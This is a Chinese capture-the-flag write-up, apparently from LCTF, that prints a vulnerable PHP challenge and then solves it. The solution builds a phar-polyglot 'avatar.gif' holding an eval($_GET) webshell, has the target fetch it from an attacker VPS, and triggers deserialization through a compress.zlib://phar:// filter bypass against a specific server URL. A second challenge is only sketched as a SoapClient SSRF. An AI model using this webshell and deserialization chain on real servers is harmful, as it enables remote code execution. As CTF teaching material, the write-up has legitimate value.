1、T4lk 1s ch34p,sh0w m3 the sh31l
代码如下:
<?php $SECRET = `../read_secret`; $SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]); $FILEBOX = "../file/" . md5("K0rz3n". $_SERVER["REMOTE_ADDR"]); mkdir($SANDBOX); mkdir($FILEBOX); echo "$FILEBOX"; if (!isset($_COOKIE["session-data"])) { $data = serialize(new User($SANDBOX)); $hmac = hash_hmac("md5", $data, $SECRET); setcookie("session-data", sprintf("%s-----%s", $data, $hmac)); } class User { public $avatar; function __construct($path) { $this->avatar = $path; } } class K0rz3n_secret_flag { protected $file_path; function __destruct(){ if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){ die("Sorry Sorry Sorry"); } include_once($this->file_path); } } function check_session() { global $SECRET; $data = $_COOKIE["session-data"]; list($data, $hmac) = explode("-----", $data, 2); if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){ die("Bye"); } if ( !hash_equals(hash_hmac("md5", $data, $SECRET), $hmac) ){ die("Bye Bye"); } $data = unserialize($data); if ( !isset($data->avatar) ){ die("Bye Bye Bye"); } return $data->avatar;//返回上传路径 } function upload($path) { if(isset($_GET['url'])){ if(preg_match('/^(http|https).*/i', $_GET['url'])){ $data = file_get_contents($_GET["url"] . "/avatar.gif"); if (substr($data, 0, 6) !== "GIF89a"){ die("Fuck off"); } //?m=upload&url=http://vps/avatar.gif file_put_contents($path . "/avatar.gif", $data); die("Upload OK"); }else{ die("Hacker"); } }else{ die("Miss the URL~~"); } } function show($path) { if ( !is_dir($path) || !file_exists($path . "/avatar.gif")) { $path = "/var/www"; } header("Content-Type: image/gif"); die(file_get_contents($path . "/avatar.gif")); } function check($path){ if(isset($_GET['c'])){ if(preg_match('/^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\s)*|(.|\s)*(file)(.|\s)*/i',$_GET['c'])){ die("Hacker Hacker Hacker"); }else{ $file_path = $_GET['c']; list($width, $height, $type) = @getimagesize($file_path); die("Width is :" . $width." px<br>" . "Height is :" . $height." px<br>"); } }else{ list($width, $height, $type) = @getimagesize($path."/avatar.gif"); die("Width is :" . $width." px<br>" . "Height is :" . $height." px<br>"); } } function move($source_path,$dest_name){ global $FILEBOX; $dest_path = $FILEBOX . "/" . $dest_name; if(preg_match('/(log|etc|session|proc|root|secret|www|history|file|..|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i',$source_path)){ die("Hacker Hacker Hacker"); }else{ if(copy($source_path,$dest_path)){ die("Successful copy"); }else{ die("Copy failed"); } } } $mode = $_GET["m"]; if ($mode == "upload"){ upload(check_session()); } else if ($mode == "show"){ show(check_session()); } else if ($mode == "check"){ check(check_session()); } else if($mode == "move"){ move($_GET['source'],$_GET['dest']); } else{ highlight_file(__FILE__); }
1、上传恶意文件,反序列化的时候包含上传的文件,注意生成的avatar.gif不仅可以反序列化覆盖上传路径$file_path,也可以通过setStub向恶意文件中写入php代码,文件包含
?m=upload&url=http://vps/avatar.gif
<?php class K0rz3n_secret_flag { protected $file_path='/var/www/data/67bf5ff3cfa1cdd00f700328698c2adb/avatar.gif'; function __destruct(){ if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){ die("Sorry Sorry Sorry"); } include_once($this->file_path); } } $a= new K0rz3n_secret_flag(); $p = new Phar('./1.phar', 0); $p->startBuffering(); $p->setStub('GIF89a<?php echo 1;eval($_GET["a"]);?'.'><?php __HALT_COMPILER(); ?'.'>'); $p->setMetadata($a); $p->addFromString('1.txt','text'); $p->stopBuffering(); rename('./1.phar', 'avatar.gif');
生成的恶意文件
2、check的时候触发反序列化。通过compress.zlib://phar绕过正则。参考链接:https://blog.zsxsoft.com/post/38
http://212.64.7.171/LCTF.php?m=check&c=compress.zlib://phar:///var/www/data/dccb75e38fe3fc2c70fd169f263e6d37/avatar.gif&a=phpinfo();
2、bestphp's revenge
通过Soap类进行反序列化,进行ssrf.具体参考:https://xz.aliyun.com/t/3339#toc-3 https://xz.aliyun.com/t/3341#toc-22 https://www.anquanke.com/post/id/164569
参考链接:
https://xz.aliyun.com/t/3341#toc-8
https://xz.aliyun.com/t/3339#toc-4